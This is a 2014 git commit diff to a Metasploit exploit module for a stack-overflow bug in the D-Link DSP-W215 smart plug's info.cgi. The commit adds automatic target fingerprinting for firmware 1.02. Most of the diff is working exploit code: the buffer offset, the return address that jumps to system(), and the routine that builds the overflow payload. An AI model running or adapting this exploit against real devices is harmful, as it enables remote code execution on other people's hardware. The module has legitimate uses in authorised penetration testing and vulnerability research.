auto target

Michael Messner · Michael Messner · commit f068006f0522 · 2014-07-09T21:53:11.000+02:00
diff --git a/modules/exploits/linux/http/dlink_dspw215_info_cgi_rop.rb b/modules/exploits/linux/http/dlink_dspw215_info_cgi_rop.rb
@@ -35,7 +35,12 @@ def initialize(info = {})
         ],
       'Targets'        =>
         [
-          [ 'D-Link DSP-W215',
+          #
+          # Automatic targeting via fingerprinting
+          #
+          [ 'Automatic Targeting', { 'auto' => true }  ],
+
+          [ 'D-Link DSP-W215 - v1.02',
             {
               'Offset'      => 477472,
               'Ret'         => "\x00\x40\x5C\xEC",    # jump to system - my_cgi.cgi
@@ -52,20 +57,51 @@ def check
         'uri' => "/common/info.cgi",
         'method'  => 'GET'
       })
-
       if res && [200, 301, 302].include?(res.code)
-        return Exploit::CheckCode::Detected
+
+        # trying to automatically detect a vulnerable device
+        # I think there are other vulnerable devices out there
+        # Todo: Check more devices and create some more targets
+        if (target['auto'])
+          if res.body =~ /DSP-W215A1/ && res.body =~ /1.02/
+
+            self.targets.each do |t|
+              if (t.name =~ /DSP-W215.*1.02/) then
+                @mytarget = t
+                break
+              end
+            end
+          end
+
+          print_status("#{peer} - Selected Target: #{@mytarget.name}")
+          print_good("#{peer} - detected a vulnerable device")
+          return Exploit::CheckCode::Detected
+
+        # no auto-targetting ... the user is responsible
+        else
+          print_good("#{peer} - detected a device with unknown exploitability ... trying to exploit")
+          return Exploit::CheckCode::Detected
+        end
       end
+
     rescue ::Rex::ConnectionError
       return Exploit::CheckCode::Unknown
     end
 
     Exploit::CheckCode::Unknown
   end
 
+  def target
+    return @mytarget if @mytarget
+    super
+  end
+
   def exploit
     print_status("#{peer} - Trying to access the vulnerable URL...")
 
+    # Use a copy of the target
+    @mytarget = target
+
     unless check == Exploit::CheckCode::Detected
       fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
     end
@@ -78,8 +114,8 @@ def exploit
   end
 
   def prepare_shellcode(cmd)
-    buf = rand_text_alpha_upper(target['Offset'])   # Stack filler
-    buf << target['Ret']                            # Overwrite $ra -> jump to system
+    buf = rand_text_alpha_upper(@mytarget['Offset'])   # Stack filler
+    buf << @mytarget['Ret']                            # Overwrite $ra -> jump to system
 
            # la $t9, system
            # la $s1, 0x440000
